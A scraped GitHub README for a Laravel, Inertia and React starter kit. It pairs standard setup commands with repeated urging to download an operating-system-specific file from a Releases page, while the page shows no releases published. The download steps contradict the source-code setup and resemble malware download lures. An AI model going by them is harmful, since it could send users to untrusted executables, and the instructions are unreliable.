Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Sign up
Appearance settings

πŸš€ Build modern web apps with Laravel, Inertia, and React, combining a powerful backend with a smooth front-end experience for efficient development.

Bri20-ctrl/laravel-starter-kit-inertia-react

Folders and files

NameName
Last commit message
Last commit date

Latest commit

History

55 Commits

Repository files navigation

πŸŽ‰ laravel-starter-kit-inertia-react - A Simple Start for Quality Code

Download Now

πŸš€ Getting Started

Welcome to the Laravel Starter Kit (Inertia & React). This setup helps you begin with quality code right from the start. Below is your step-by-step guide to download and run the software easily.

πŸ’» System Requirements

  • Operating System: Windows, macOS, or Linux
  • PHP Version: 7.4 or higher
  • Composer: Required for managing dependencies
  • Node.js: Version 14 or higher
  • NPM or Yarn: For managing JavaScript packages

πŸ“₯ Download & Install

To get the software, visit this page to download: GitHub Releases.

  1. Click the link above to open the Releases page.
  2. Find the latest version.
  3. Look for the assets section. You will see files available for download.
  4. Click on the file that fits your operating system to download it.

πŸ› οΈ Setting Up the Application

Once downloaded, follow these steps to set up your application:

  1. Extract the Files: Locate the downloaded file on your computer. Right-click and select "Extract All" to unzip the files.

  2. Open Command Line Interface:

    • Windows: Press Win + R, type cmd, and hit enter.
    • macOS: Use Spotlight Search (Cmd + Space) and type Terminal.
    • Linux: Open your preferred terminal application.
  3. Navigate to the Project Directory: Use the command below, replacing path/to/folder with the actual path where you extracted the files.

    cd path/to/folder
    
  4. Install Dependencies: Run the following command to install necessary packages.

    composer install
    

    Then install JavaScript dependencies:

    npm install
    
  5. Set Up Your Environment: Copy the example environment file to create your own:

    cp .env.example .env
    

    Open .env and update the configuration as needed.

  6. Generate Application Key: Use the command below to generate a unique key for your application.

    php artisan key:generate
    
  7. Run Migrations: To set up the database structure, run:

    php artisan migrate
    
  8. Start the Local Development Server: Run this command to serve your application:

    php artisan serve
    

    Open your web browser and go to http://localhost:8000. You should see your application running.

🎨 Features

  • Type-Safe Code: Ensures that your application runs without unexpected errors.
  • Inertia.js Integration: Offers a smooth experience for navigating between pages.
  • React Components: Use React for creating interactive UIs with ease.
  • Robust Database Support: Easily handle your application's data.
  • Development & Production Environments: Seamlessly switch between development and production modes.

πŸ“š Resources

πŸ”— Extra Help

If you encounter issues during installation, check the following:

  • Ensure all system requirements are met.
  • Look at the logs in your terminal for specific error messages.
  • Visit the issues section on GitHub for troubleshooting tips or to report problems.

πŸ’¬ Support

Feel free to reach out via the discussion tab on GitHub. The community is ready to help you succeed with Laravel Starter Kit.

Remember to return to download the latest updates here: GitHub Releases. Happy coding!

About

πŸš€ Build modern web apps with Laravel, Inertia, and React, combining a powerful backend with a smooth front-end experience for efficient development.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 6

AltStyle γ«γ‚ˆγ£γ¦ε€‰ζ›γ•γ‚ŒγŸγƒšγƒΌγ‚Έ (->γ‚ͺγƒͺγ‚ΈγƒŠγƒ«) /